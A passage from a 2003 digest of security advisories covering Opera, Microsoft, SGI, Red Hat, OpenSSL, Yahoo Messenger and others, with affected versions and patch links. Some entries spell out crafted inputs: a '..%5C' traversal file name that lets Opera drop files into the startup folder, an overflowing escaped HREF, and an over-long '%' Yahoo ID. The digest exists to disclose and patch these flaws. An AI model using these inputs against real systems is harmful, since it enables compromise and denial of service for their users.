  "Open with Opera"  to  "Show download dialog"  or etc,
  the auto-install function will be disabled and you can avoid
  this vulnerability.

  If you want to re-enable the auto-install function, change the
  actions of these MIME types to  "Open with Opera".


TECHNICAL DETAILS
======================

  Opera 7 has the auto-install function for Skin File, and version
  7.10 or later has the same one for Configuration Files.
  This auto-install function will be executed when Opera gets an
  arbitrary file with MIME-types from a Remote Server;
  "application/x-opera-configuration-XXXXX" or "application/x-opera
  -skin".
  When Opera receives a file and one of these MIME-types,  whether
  user accept them or not,  the file will automatically be saved
  with the name that was used while downloading to the directory
  for Configuration Files in the User-Directory or Installed-
  Directory.
  But this automatically saved file's name is not sanitized enough.
  Therefore, the file could be saved in any directory which can be
  specified with a relative path when the file name contains the
  illegal character string '..%5C'.  Even though the directory is
  outside of expected scope.
  (This is restricted within the directory that Opera's process
  can write and the existing files cannot be overwritten and deleted.)

  For example, if an executable file was saved in the start-up
  directory and it ran when a user reboots computer, the user would
  face a risk of Virus infection or Trojan horse running inside.
  Moreover, the executable file could be for destroying a computer,
  deleting data or any kinds of malicious one.

  In addition, this vulnerability is different from other
  vulnerabilities like buffer overflow, any advanced skills
  are not necessary for exploiting.  So we assume this is
  highly dangerous for users.


  Additional Description:

  Mr. S. G. Masood has reported a similar vulnerability on 12 Nov 2003
  while we were researching on this vulnerability. 
  And it was announced that the vulnerability Mr. Masood reported has
  fixed at version 7.22.
  Though, what we researched has higher severity and hasn't been
  fixed yet even at version 7.22 now.

Patches

Upgrade to 7.23.
www.opera.com

SGI Advanced Linux Environment security update #5

2003-11-19

Risk level: important

Type: many types

Source of info: SGI Security Team

Impact

SGI has released Patch 10032: SGI Advanced Linux Environment security
update #5, which includes updated RPMs for SGI ProPack v2.2.1 and SGI
ProPack v2.3 for the Altix family of systems

Overview

This update has been released in response to the
following erratas released by Red Hat:

 Updated XFree86 packages provide security and bug fixes
 https://rhn.redhat.com/errata/RHSA-2003-289.html

 Updated zebra packages fix security vulnerabilities
 https://rhn.redhat.com/errata/RHSA-2003-305.html

 Updated fileutils packages fix ls vulnerabilities
 https://rhn.redhat.com/errata/RHSA-2003-310.html

 Updated PostgreSQL packages fix buffer overflow
 https://rhn.redhat.com/errata/RHSA-2003-314.html

 Updated iproute packages fix local security vulnerability
 https://rhn.redhat.com/errata/RHSA-2003-317.html

 Updated Ethereal packages fix security issues
 https://rhn.redhat.com/errata/RHSA-2003-324.html

Patches

Patch 10032 is available from http://support.sgi.com/
or the individual RPMs from Patch 10032 are available from:
ftp://oss.sgi.com/projects/sgi_propack/download/2.2.1/updates/RPMS
ftp://oss.sgi.com/projects/sgi_propack/download/2.2.1/updates/SRPMS
ftp://oss.sgi.com/projects/sgi_propack/download/2.3/updates/RPMS
ftp://oss.sgi.com/projects/sgi_propack/download/2.3/updates/SRPMS

Certificate Validation Flaw Could Enable Identity Spoofing (Revised MS02-050)

2003-11-13

Risk level: Important

Type: flaw

Source of info: Microsoft Security Team

Impact

The vulnerability identified in the original version of the bulletin 
could enable an attacker who had a valid end-entity certificate to 
issue a subordinate certificate that, although bogus, would 
nevertheless pass validation. Because CryptoAPI is used by a wide 
range of applications, this could enable a variety of identity 
spoofing attacks. 

Overview

Microsoft re-issued this security bulletin on November 11, 2003 to 
advise on the availability of an updated Microsoft Windows 2000
Service Pack 4 (SP4) security patch. This revised security patch 
corrects a regression that may occur during the installation of 
Microsoft Internet Explorer 6.0 Service Pack 1 on Windows 2000 SP4. 
This regression removes the update that is discussed in this bulletin
and that is provided as part of Windows 2000 SP4. Customers who are 
using Windows 2000 SP4 and then installed Internet Explorer 6.0 
Service Pack 1 should apply the updated Windows 2000 SP4 security 
patch to help protect from this vulnerability.


Mitigating Factors:
  The user could always manually check a certificate chain, and 
might notice in the case of a spoofed chain that there was an 
unfamiliar intermediate CA. 
*   Unless the attacker's digital certificates were issued by a CA 
in the user's trust list, the certificate would generate a 
warning when validated. 
*   The attacker could only spoof certificates of the same type as 
the one he or she possessed. In the case where the attacker 
attempted an attack using a high-value certificate such as 
Authenticode certificates, this would necessitate obtaining a 
legitimate certificate of the same type - which could require 
the attacker to prove his or her identity or entitlement to the 
issuing CA. 

Patches

http://www.microsoft.com/technet/security/bulletin/MS02-050.asp 

Vulnerabilities in Microsoft Word and Microsoft Excel

2003-11-12

Risk level: high

Type: Remote code execution

Source of info: Microsoft Security Team

Impact

Vulnerabilities in Microsoft Word and Microsoft
Excel Could Allow Arbitrary Code to run

Overview

Included in this advisory is an update describing newly discovered
vulnerabilities in Microsoft Office (Microsoft Word and Excel).

Affected Software: 
               - Microsoft Excel 97 
               - Microsoft Excel 2000 
               - Microsoft Excel 2002 
               - Microsoft Word 97 
               - Microsoft Word 98(J) 
               - Microsoft Word 2000, Microsoft  
                 Works Suite 2001
               - Microsoft Word 2002, Microsoft 
                 Works Suite 2002,
                 Microsoft Works Suite 2003 and
                 Microsoft Works Suite 2004

Denial of Service in OpenSSL 0.9.6k (ASN.1 parsing) under MS Windows

2003-11-04

Risk level: medium

Type: Buffer overflow

Source of info: openssl.org

Impact

Previously, OpenSSL 0.9.6k was released on the 30 September 2003 to
address various ASN.1 issues.  The issues were found using a test
suite from NISCC (www.niscc.gov.uk) and fixed by Dr Stephen Henson
(steve@openssl.org) of the OpenSSL core team.

Subsequent to that release, Novell Inc. carried out further testing
using the NISCC suite.  They discovered that there was a denial of
service vulnerability in OpenSSL version 0.9.6k when running on a
Windows platform.

Overview

A bug in OpenSSL 0.9.6 would cause certain ASN.1 sequences to trigger
a large recursion.  On platforms such as Windows this large recursion
cannot be handled correctly and so the bug causes OpenSSL to crash.  A
remote attacker could exploit this flaw if they can send arbitrary
ASN.1 sequences which would cause OpenSSL to crash.  This could be
performed for example by sending a client certificate to a SSL/TLS
enabled server which is configured to accept them.

We do not believe this issue could be exploited further than a Denial
of Service attack.  

Patches for this issue have been created by Dr Stephen Henson
(steve@openssl.org) of the OpenSSL core team.


OpenSSL 0.9.6k is affected by the bug, but the denial of service does
not affect all platforms.  This issue does not affect OpenSSL 0.9.7.
Currently only OpenSSL running on Windows platforms is known to crash.

Upgrade to OpenSSL 0.9.6l or 0.9.7c.  Recompile any OpenSSL applications statically linked to OpenSSL libraries.

Patches

http://www.openssl.org/source/
ftp://ftp.openssl.org/source/
FTP mirrors you can find here:
http://www.openssl.org/source/mirror.html

Updated fileutils/coreutils package fix ls vulnerabilities

2003-11-03

Risk level: high

Type: DoS

Source of info: Red Hat Security Team

Impact

Updated fileutils and coreutils packages that close a potential denial of service vulnerability are now available.

Overview

The fileutils package contains several basic system utilities. One of
these utilities is the "ls" program, which is used to list information
about files and directories. In Red Hat Linux 9, the ls program is part of
the coreutils package.

Georgi Guninski discovered a memory starvation denial of service
vulnerability in the ls program.  It is possible to make ls allocate a
huge amount of memory by specifying certain command line arguments.  This
vulnerability is remotely exploitable through services like wu-ftpd, which
pass user arguments to ls.  The Common Vulnerabilities and Exposures
project (cve.mitre.org) has assigned the name CAN-2003-0854 to this issue.

A non-exploitable integer overflow in ls has also been discovered.  It is
possible to make ls crash by specifying certain command line arguments. 
This vulnerability is remotely exploitable through services like wu-ftpd,
which pass user arguments to ls.  The Common Vulnerabilities and Exposures
project (cve.mitre.org) has assigned the name CAN-2003-0853 to this issue.

This erratum contains new fileutils packages for Red Hat Linux versions
7.1, 7.2, 7.3, and 8.0.  It also contains new coreutils packages for Red
Hat Linux 9.  These packages contain backported patches correcting these
vulnerabilities.

The Red Hat Linux 7.2 and 7.3 packages also add support for the
O_DIRECT flag, which controls the use of synchronous I/O on file systems
such as OCFS.

Patches

SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/fileutils-4.0.36-4.3.src.rpm

i386:
ftp://updates.redhat.com/7.1/en/os/i386/fileutils-4.0.36-4.3.i386.rpm

Red Hat Linux 7.2:
SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/fileutils-4.1-10.4.src.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/fileutils-4.1-10.4.i386.rpm

ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/fileutils-4.1-10.4.ia64.rpm

Red Hat Linux 7.3:
SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/fileutils-4.1-10.4.src.rpm

i386:
ftp://updates.redhat.com/7.3/en/os/i386/fileutils-4.1-10.4.i386.rpm

Red Hat Linux 8.0:
SRPMS:
ftp://updates.redhat.com/8.0/en/os/SRPMS/fileutils-4.1.9-11.2.src.rpm

i386:
ftp://updates.redhat.com/8.0/en/os/i386/fileutils-4.1.9-11.2.i386.rpm

Red Hat Linux 9:
SRPMS:
ftp://updates.redhat.com/9/en/os/SRPMS/coreutils-4.5.3-19.0.2.src.rpm

i386:
ftp://updates.redhat.com/9/en/os/i386/coreutils-4.5.3-19.0.2.i386.rpm

Microsoft Windows Security Bulletin Summary for October 2003

2003-10-30

Risk level: high

Type: Remote code execution

Source of info: Microsoft Security Team

Impact

ubsequent to the release of the Windows Security Bulletin Summary for October, the following bulletins have undergone a major revision 
increment:
- MS03-042
- MS03-043
- MS03-045

Overview

 MS03-042 - Buffer Overflow in the Windows Troubleshooter ActiveX Control Could Allow Code Execution (826232)

Affected Software:
 - Windows 2000, Service Pack 2
 - Windows 2000, Service Pack 3, Service Pack 4 
Version Number: V2.0

Reason for Major Revision, V2.0 October 29, 2003:
=================================================
     Microsoft re-issued this bulletin on October 29, 2003 to advise on the availability of an updated Windows 2000 patch.

     This revised patch corrects the Debug Programs(SeDebugPrivilege) user right issue that some customers experienced with the  original patch that is discussed in Knowledge Base Article
830846.

     This problem is unrelated to the security vulnerability discussed in this bulletin. Customers who have already applied the patch are protected against the vulnerability discussed in 
this bulletin.


 MS03-043 - Buffer Overrun in Messenger Service Could Allow Code Execution (828035)

Affected Software:
    - Windows NT Workstation 4.0, Service Pack 6a
    - Windows NT Server 4.0, Service Pack 6a
    - Windows NT Server 4.0, Terminal Server Edition, Service Pack 6
    - Windows 2000, Service Pack 2
    - Windows 2000, Service Pack 3, Service Pack 4
    - Windows XP Gold, Service Pack 1
    - Windows XP 64-bit Edition
    - Windows XP 64-bit Edition Version 2003
    - Windows Server 2003
    - Windows Server 2003 64-bit Edition 

Impact: Remote Code Execution
Version Number: 2.0
     
Reason for Major Revision, V2.0 October 29, 2003:
=================================================
     Microsoft re-issued this bulletin on October 29, 2003 to advise on the availability of an updated Windows 2000, Windows XP, and Windows Server 2003 patch.

     This revised patch corrects the Debug Programs (SeDebugPrivilege) user right issue that some customers experienced with the original patch that is discussed in Knowledge Base Article
830846.

     This problem is unrelated to the security vulnerability discussed in this bulletin. Customers who have already applied the patch are protected against the vulnerability discussed in this bulletin.


 MS03-045 - Buffer Overrun in the ListBox and in the ComboBox Control Could Allow Code Execution (824141)

Affected Software:
    - Windows NT Workstation 4.0, Service Pack 6a
    - Windows NT Server 4.0, Service Pack 6a
    - Windows NT Server 4.0, Terminal Server Edition, Service Pack 6
    - Windows 2000, Service Pack 2
    - Windows 2000, Service Pack 3, Service Pack 4
    - Windows XP Gold, Service Pack 1
    - Windows XP 64-bit Edition
    - Windows XP 64-bit Edition Version 2003
    - Windows Server 2003
    - Windows Server 2003 64-bit Edition 

Impact: Remote Code Execution
Version Number: 3.0

Reason for Major Revision, V3.0 October 29, 2003:
=================================================
     Microsoft re-issued this bulletin on October 29, 2003 to advise on the availability of an updated Windows XP patch. 

     This revised patch corrects the Debug Programs (SeDebugPrivilege) user right issue that some customers experienced with the  original patch that is discussed in Knowledge Base Article
830846.

     This problem is unrelated to the security vulnerability discussed in this bulletin. Customers who have already applied the patch are protected against the vulnerability discussed in 
 this bulletin.

Patches

http://www.microsoft.com/technet/security/bulletin/winoct03.asp 

Several updates for SGI

2003-10-27

Risk level: high

Type: Buffer overflow

Source of info: SGI Security Team

Impact

SGI Advanced Linux Environment security updates has been released: Patch 10026 (security update #2), 10027(security update #3), 10031 (security upadte #2) and includes updated RPMs for SGI ProPack v2.2.1 and SGI ProPack v2.3 for the Altix family of systems. 

Overview

Patch 10026 includes updated RPMs for SGI ProPack v2.2.1 and SGI ProPack v2.3 for the Altix family of systems, in response to the following erratas released by Red Hat:

 Updated OpenSSH packages fix potential vulnerabilities
 https://rhn.redhat.com/errata/RHSA-2003-280.html

 Updated Sendmail packages fix vulnerability
 https://rhn.redhat.com/errata/RHSA-2003-284.html

Patch 10027 includes updated RPMs for SGI ProPack v2.2.1 and SGI ProPack v2.3 for the Altix family of systems, in response to the following erratas released by Red Hat:

 Updated MySQL packages fix vulnerability
 https://rhn.redhat.com/errata/RHSA-2003-282.html

 Updated SANE packages fix remote vulnerabilities
 https://rhn.redhat.com/errata/RHSA-2003-285.html

 Updated OpenSSL packages fix vulnerabilities
 https://rhn.redhat.com/errata/RHSA-2003-293.html

 Updated Apache and mod_ssl packages fix security vulnerabilities
 https://rhn.redhat.com/errata/RHSA-2003-244.html

 Updated Perl packages fix security issues
 https://rhn.redhat.com/errata/RHSA-2003-257.html

 Updated KDE packages fix security issues
 https://rhn.redhat.com/errata/RHSA-2003-270.html

 Updated pine packages fix vulnerabilities
 https://rhn.redhat.com/errata/RHSA-2003-274.html

 Updated pam_smb packages fix remote buffer overflow
 https://rhn.redhat.com/errata/RHSA-2003-262.html

 Updated OpenLDAP packages fix various vulnerabilities
 https://rhn.redhat.com/errata/RHSA-2002-312.html

 Updated GDM packages fix minor security issues
 https://rhn.redhat.com/errata/RHSA-2003-259.html

 Updated WindowMaker packages fix vulnerability in theme-loading
 https://rhn.redhat.com/errata/RHSA-2003-009.html

 Updated ghostscript packages fix vulnerability
 https://rhn.redhat.com/errata/RHSA-2003-182.html

 Updated zlib packages fix gzprintf buffer overflow vulnerability
 https://rhn.redhat.com/errata/RHSA-2003-081.html

Patch 10031 includes updated RPMs for SGI ProPack v2.2.1 and SGI ProPack v2.3 for the Altix family of systems, in response to the following erratas released by Red Hat:
 Updated Mozilla packages fix security vulnerability
 https://rhn.redhat.com/errata/RHSA-2003-163.html

Patches

Patches are available from 
http://support.sgi.com/

Buffer Overflow in Yahoo messenger Client

2003-10-26

Risk level: medium

Type: Buffer overflow

Source of info: Hat-Squad Security Team

Impact

Vulnerability in Yahoo Messenger File Transfer option allows a remote attacker to shut down the victim client.

Overview

The Yahoo messenger service filters some special characters in YahooID field like (x,&,?).When attacker initiates a file send request to victimID%%%%%%%%%(more than 73 chars), the service filters % chars and prompts "victimID" for an incoming file transfer session.If victim accepts the incoming file, his client will be shut down with access violation error. The access violation accurse in FT.DLL that is responsible for p2p YM file transfers.

Revised Microsoft summary bulletins for October 2003

2003-10-23

Risk level: Important

Type: many types

Source of info: Microsoft Security Team

Impact

Subsequent to the release of the Windows Security Bulletin Summary for October and the Microsoft Exchange Security Bulletin Summary for October , the following bulletins has undergone a major revision 
increment: MS03-045 i MS03-047.

Overview

Included in this advisory are updates for five newly discovered 
vulnerabilities in Microsoft Windows and for two in Microsoft Exchange Server. These vulnerabilities, 
broken down by product and severity  are: 

1)For Windows:
** Critical Security Bulletins
MS03-041 - Vulnerability in Authenticode Could Allow Remote Code Execution (823182)
Affected Software: 
- Windows NT Workstation 4.0, Service Pack 6a
- Windows NT Server 4.0, Service Pack 6a
- Windows NT Server 4.0, Terminal Server Edition, Service Pack 6
- Windows 2000, Service Pack 2
- Windows 2000, Service Pack 3, Service Pack 4
- Windows XP Gold, Service Pack 1
- Windows XP 64-bit Edition
- Windows XP 64-bit Edition Version 2003
- Windows Server 2003
- Windows Server 2003 64-bit Edition
Impact: Remote Code Execution
Version Number: 1.1 

MS03-042 - Buffer Overflow in the Windows Troubleshooter ActiveX Control Could Allow Code Execution (826232)
Affected Software:
- Windows 2000, Service Pack 2
- Windows 2000, Service Pack 3, Service Pack 4 
Impact: Remote Code Execution
Version Number: 1.1

MS03-043 - Buffer Overrun in Messenger Service Could Allow Code Execution (828035)
Affected Software:
- Windows NT Workstation 4.0, Service Pack 6a
- Windows NT Server 4.0, Service Pack 6a
- Windows NT Server 4.0, Terminal Server Edition,  
 Service Pack 6
- Windows 2000, Service Pack 2
- Windows 2000, Service Pack 3, Service Pack 4
- Windows XP Gold, Service Pack 1
- Windows XP 64-bit Edition
- Windows XP 64-bit Edition Version 2003
- Windows Server 2003
- Windows Server 2003 64-bit Edition 
Impact: Remote Code Execution
Version Number: 1.1

MS03-044 - Buffer Overflow in Windows Help and Support Center Could lead to System Compromise (825119)
Affected Software:
- Windows Millennium Edition
- Windows NT Workstation 4.0, Service Pack 6a
- Windows NT Server 4.0, Service Pack 6a
- Windows NT Server 4.0, Terminal Server Edition,  
 Service Pack 6
- Windows 2000, Service Pack 2
- Windows 2000, Service Pack 3, Service Pack 4
- Windows XP Gold, Service Pack 1
- Windows XP 64-bit Edition
- Windows XP 64-bit Edition Version 2003
- Windows Server 2003
- Windows Server 2003 64-bit Edition 
Impact: Remote Code Execution
Version Number: 1.1

** Important Security Bulletins
MS03-045 - Buffer Overrun in the ListBox and in the ComboBox Control Could Allow Code Execution (824141)
Affected Software:
- Windows NT Workstation 4.0, Service Pack 6a
- Windows NT Server 4.0, Service Pack 6a
- Windows NT Server 4.0, Terminal Server Edition,  
 Service Pack 6
- Windows 2000, Service Pack 2
- Windows 2000, Service Pack 3, Service Pack 4
- Windows XP Gold, Service Pack 1
- Windows XP 64-bit Edition
- Windows XP 64-bit Edition Version 2003
- Windows Server 2003
- Windows Server 2003 64-bit Edition 
Impact: Remote Code Execution
Version Number: 2.0
     Reason for Major Revision, V2.0 October 22, 2003:
     =================================================
     Subsequent to the release of this bulletin and the associated 
     patches, a compatibility problem with some third party 
     software has been identified with a set of language specific 
     versions of the Windows 2000 Service Pack 4 patch. This problem
     is unrelated to the security vulnerability discussed in this 
     bulletin. Customers who have applied the patch are protected 
     against the vulnerability discussed in this bulletin.

     Microsoft has developed a fix for this issue and is 
     re-releasing this bulletin to reflect the new updated patches.  
     The compatibility problems only affect the language versions 
     of the patch listed within the bulletin and only those versions
     of the patch are being re-released. Other language versions of 
     this patch are not affected and are not being re-released. 
     Please note that the new security patches support both the 
     Setup switches originally documented in this bulletin as well 
     as a set of new Setup switches that are document in the 
     Installation Information Section of this bulletin. 
     Additionally, the updated language versions support Windows 
     2000 Service Pack 2, Windows 2000 Service Pack 3, and 
     Windows 2000 Service Pack 4 in a single security patch. 

2)For Microsoft Exchange Server:
vulnerabilities in Microsoft Exchange Server. These vulnerabilities, 
broken down by severity are: 

** Critical Security Bulletins

MS03-046 - Vulnerability in Exchange Server could allow Arbitrary Code Execution (829436)
Affected Software: 
- Exchange Server 5.5
- Exchange 2000 Server
Impact: Remote Code Execution
Version Number: 1.1 

** Moderate Security Bulletins 

MS03-047 - Vulnerability in Exchange Server 5.5 Outlook Web Access Could Allow Cross-Site Scripting Attack (828489)
Affected Software:
Exchange Server 5.5
Impact: Remote Code Execution 
Version Number: 2.0
     Reason for Major Revision, V2.0 October 22, 2003:  =================================================
     Subsequent to the original release of this bulletin, it was
     discovered that certain languages were not covered by the
     original patch. This bulletin has been updated to provide 
     information about a new patch, which is intended for customers
     having installed a language from the Language Packs for
     Outlook Web Access. In addition, for this patch to function 
     properly the Outlook Web Access (OWA) server on which the 
     patch is installed must have Internet Explorer 5.01 or greater
     installed. If the patch is installed on a system with a version
     of IE less than 5.01, unexpected consequences may result.
     The "Caveats" section has been updated to include version
     requirements for this patch. It also contains version
     recommendations for dependent components that are applicable at
     the time of this writing. The deployment section has also been 
     expanded to discuss in detail how to download and install this
     security patch.
 

Patches

http://www.microsoft.com/technet/security/bulletin/excoct03.asp 
http://www.microsoft.com/technet/security/bulletin/winoct03.asp 

Opera HREF escaped server name overflow

2003-10-20

Risk level: high

Type: Buffer overflow

Source of info: @stake, Inc.

Impact

The Opera browser exhibits a failure when rendering HTML. Certain
HREFs cause a buffer allocated on the heap to overflow. Arbitrary
bytes in the heap may be overwritten. This can result in the
compromise of systems running Opera. Opera's mail system seems to be
vulnerable also and recovery from reading an email is somewhat
difficult. 

Overview

An attacker can send an email containing HTML to a user running the
Opera mail client and cause this overflow to occur when the HTML is
rendered. An owner of a web site can craft a malicious web page
containing the problematic HTML to cause an overflow on Opera
clients visiting the site.


Details:

Rendering HREFs with certain illegally escaped server names in the
URL will cause Opera to crash due to a buffer management problem.
Sometimes the crash is observed immediately, sometimes when the
browser is closed, presumably as the resources are being freed.

The escaped URLs are of the form:

<a href="file://server%%[many % characters]%%text" ></a>

Patches

Upgrade to the version 7.21:
http://www.opera.com/download/

Mod_security 1.7 for Apache has been released

2003-10-19

Risk level: none

Type: none

Source of info: mod_security.org

Impact

Mod_security is an Apache module whose purpose is to protect
vulnerable applications and reject human or automated attacks.
It is an open source intrusion detection and prevention system
for Apache. In addition to request filtering, it also creates Web
application audit logs. Requests are filtered using regular
expressions. Some of the things possible are:

 * Apply filters against any part of the request (URI,
   headers, either GET or POST)
 * Apply filters against individual parameters
 * Reject SQL injection attacks
 * Reject Cross site scripting attacks

With few general rules mod_security can protect from both
known and unknown vulnerabilities.

Overview

Changes (v1.7)
--------------

 * Output filtering has been added to Apache 2.x.

 * The ability to filter cookies directly has been added.

 * Apache can now pretend to be some other Web server through
   the SecServerSignature directive.

 * Three new actions: "allow" to finish filter processing and let
   the request through, "chain" to chain several filter together
   (logical AND), and "skipnext" to skip over filters.

 * A new anti-evasion technique to fight null-byte attacks.

 * Finally, the module now runs on Netware.

Ircd remote denial of service vulnerability

2003-10-19

Risk level: medium

Type: Remote DoS

Source of info: OpenPKG

Impact

 According to a report from Piotr Kucharski  a buffer overflow  vulnerability exists in ircd that allows a remote attacker to  crash the ircd server, thus causing a denial of service condition.

Overview

 The Common Vulnerabilities and Exposures (CVE) project assigned the id
  CAN-2003-0864 [2] to the problem.

  Please check whether you are affected by running "<prefix>/bin/rpm -q
  ircd". If you have the "ircd" package installed and its version is
  affected (see above), we recommend that you immediately upgrade it
  (see Solution). [3][4]

Solution:
  Select the updated source RPM appropriate for your OpenPKG release, fetch it from the OpenPKG FTP service(ftp://ftp.openpkg.org/release/1.2/UPD/
 or ftp://ftp.openpkg.org/release/1.3/UPD/) or a mirror location, verify its integrity, build a corresponding binary RPM from it and update your OpenPKG installation by applying the binary
  RPM. For the current release OpenPKG 1.3, perform the following operations to permanently fix the security problem (for other releases
  adjust accordingly).

Patches

ftp://ftp.openpkg.org/release/1.3/UPD/ircd-2.10.3p3-1.3.1.src.rpm

Windows and Exchange Server Security Bulletins Summary for October 2003

2003-10-17

Risk level: critical

Type: many types

Source of info: Microsoft Security Team

Impact

Included in this advisory are updates for seven newly discovered 
vulnerabilities in Microsoft Windows and Microsoft Exchange Server. These vulnerabilities, 
broken down by severity are

Overview

These vulnerabilities, 
broken down by severity are:
\\Critical Security Bulletins\\

    MS03-041 - Vulnerability in Authenticode Could Allow Remote Code Execution (823182)
      - Affected Software: 
      - Windows NT Workstation 4.0, Service Pack 6a
      - Windows NT Server 4.0, Service Pack 6a
      - Windows NT Server 4.0, Terminal Server Edition, Service Pack 6
      - Windows 2000, Service Pack 2
      - Windows 2000, Service Pack 3, Service Pack 4
      - Windows XP Gold, Service Pack 1
      - Windows XP 64-bit Edition
      - Windows XP 64-bit Edition Version 2003
      - Windows Server 2003
      - Windows Server 2003 64-bit Edition

      - Impact: Remote Code Execution
      - Version Number: 1.0 

    MS03-042 - Buffer Overflow in the Windows Troubleshooter 
	       ActiveX Control Could Allow Code Execution (826232)

      - Affected Software:
      - Windows 2000, Service Pack 2
      - Windows 2000, Service Pack 3, Service Pack 4 

      - Impact: Remote Code Execution
      - Version Number: 1.0

    MS03-043 - Buffer Overrun in Messenger Service Could Allow 
	       Code Execution (828035)

      - Affected Software:
      - Windows NT Workstation 4.0, Service Pack 6a
      - Windows NT Server 4.0, Service Pack 6a
      - Windows NT Server 4.0, Terminal Server Edition,  
                 Service Pack 6
      - Windows 2000, Service Pack 2
      - Windows 2000, Service Pack 3, Service Pack 4
      - Windows XP Gold, Service Pack 1
      - Windows XP 64-bit Edition
      - Windows XP 64-bit Edition Version 2003
      - Windows Server 2003
      - Windows Server 2003 64-bit Edition 

      - Impact: Remote Code Execution
      - Version Number: 1.0

    MS03-044 - Buffer Overflow in Windows Help and Support Center Could lead to System Compromise (825119)
      - Affected Software:
      - Windows Millennium Edition
      - Windows NT Workstation 4.0, Service Pack 6a
      - Windows NT Server 4.0, Service Pack 6a
      - Windows NT Server 4.0, Terminal Server Edition,Service Pack 6
      - Windows 2000, Service Pack 2
      - Windows 2000, Service Pack 3, Service Pack 4
      - Windows XP Gold, Service Pack 1
      - Windows XP 64-bit Edition
      - Windows XP 64-bit Edition Version 2003
      - Windows Server 2003
      - Windows Server 2003 64-bit Edition 

      - Impact: Remote Code Execution
      - Version Number: 1.0
 
MS03-046 - Vulnerability in Exchange Server could allow Arbitrary Code Execution (829436)
      - Affected Software: 
      - Exchange Server 5.5
      - Exchange 2000 Server

      - Impact: Remote Code Execution
      - Version Number: 1.0 

\\Important Security Bulletins\\

    MS03-045 - Buffer Overrun in the ListBox and in the ComboBox Control Could Allow Code Execution (824141)

      - Affected Software:
      - Windows NT Workstation 4.0, Service Pack 6a
      - Windows NT Server 4.0, Service Pack 6a
      - Windows NT Server 4.0, Terminal Server Edition,  Service Pack 6
      - Windows 2000, Service Pack 2
      - Windows 2000, Service Pack 3,Service Pack 4
      - Windows XP Gold, Service Pack 1
      - Windows XP 64-bit Edition
      - Windows XP 64-bit Edition Version 2003
      - Windows Server 2003
      - Windows Server 2003 64-bit Edition 

      - Impact: Remote Code Execution
      - Version Number: 1.0


\\Moderate Security Bulletins\\
MS03-047 - Vulnerability in Exchange Server 5.5 Outlook Web Access Could Allow Cross-Site Scripting Attack (828489)
      - Affected Software:
      - Exchange Server 5.5

      - Impact: Remote Code Execution 
      - Version Number: 1.0

Patches

Patches are available to fix these vulnerabilities.
For additional information, including Technical Details, 
Workarounds, answers to Frequently Asked Questions, and Patch 
Deployment Information please read the Microsoft Exchange 
Security Bulletin Summary for October at:
http://www.microsoft.com/technet/security/excoct03.asp 

and

the Microsoft Windows 
Security Bulletin Summary for October at:
http://www.microsoft.com/technet/security/winoct03.asp 

Bad news on RPC DCOM vulnerability

2003-10-13

Risk level: Critical

Type: Buffer overflow

Source of info: ZARAZA

Impact

Universal  exploit  for  MS03-039  exists in-the-wild and it is still actual.

It  was  reported  by exploit author (and confirmed by 3ARA3A), Windows XP SP1
with  all  security  fixes  installed still vulnerable to variant of the
same bug. Windows 2000/2003 was not tested. For a while only DoS exploit
exists,  but  code execution is probably possible. 

Overview

Technical details are
sent to Microsoft, waiting for confirmation.
This is a highly critical vulnerability - users MUST block vulnerable ports !

As with the prior RPC vulnerability (MS03-039), these attacks can occur
on TCP ports 135, 139, 445 and 593; and UDP ports 135, 137, 138 and 445.

New openssl095 packages fix denial of service

2003-10-11

Risk level: high

Type: many types

Source of info: Debian Security Team

Impact

Steve Henson of the OpenSSL core team identified and prepared fixes
for a number of vulnerabilities in the OpenSSL ASN1 code that were
discovered after running a test suite by British National
Infrastructure Security Coordination Centre (NISCC).

Overview

A bug in OpenSSLs SSL/TLS protocol was also identified which causes
OpenSSL to parse a client certificate from an SSL/TLS client when it
should reject it as a protocol error.

The Common Vulnerabilities and Exposures project identifies the
following problems:

CAN-2003-0543:

   Integer overflow in OpenSSL that allows remote attackers to cause a
   denial of service (crash) via an SSL client certificate with
   certain ASN.1 tag values.

CAN-2003-0544:

   OpenSSL does not properly track the number of characters in certain
   ASN.1 inputs, which allows remote attackers to cause a denial of
   service (crash) via an SSL client certificate that causes OpenSSL
   to read past the end of a buffer when the long form is used.

CAN-2003-0545:

   Double-free vulnerability allows remote attackers to cause a denial
   of service (crash) and possibly execute arbitrary code via an SSL
   client certificate with a certain invalid ASN.1 encoding.  This bug
   was only present in OpenSSL 0.9.7 and is listed here only for
   reference.

Patches

The latest versions can be downloaded from:
http://www.openssl.org/source/

Patches for debian:
 Source archives:
    http://security.debian.org/pool/updates/main/o/openssl095/openssl095_0.9.5a-6.woody.3.dsc
      Size/MD5 checksum:      631 ba6e597ab2db2984aef6c2a765ac29c0
    http://security.debian.org/pool/updates/main/o/openssl095/openssl095_0.9.5a-6.woody.3.diff.gz
      Size/MD5 checksum:    38851 6b197111a7068a7ea29ef55176771d89
    http://security.debian.org/pool/updates/main/o/openssl095/openssl095_0.9.5a.orig.tar.gz
      Size/MD5 checksum:  1892089 99d22f1d4d23ff8b927f94a9df3997b4

  Alpha architecture:

    http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_alpha.deb
      Size/MD5 checksum:   497152 fe3d6854382f8dbe2d10f3f5700dd8f6

  ARM architecture:

    http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_arm.deb
      Size/MD5 checksum:   402498 551b79fbb80903f174d6edeffd9869df

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_i386.deb
      Size/MD5 checksum:   399752 2a856ac6b45d41beb0bf78880b236966

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_m68k.deb
      Size/MD5 checksum:   376738 980e428e9b913672d939ebe77c18cd6d

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_mips.deb
      Size/MD5 checksum:   412624 b8c7cc0b4dcbf1cf03480b93c78cd610

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_mipsel.deb
      Size/MD5 checksum:   407388 de02385580cf33c344c1ffadcf8aed88

  PowerPC architecture:

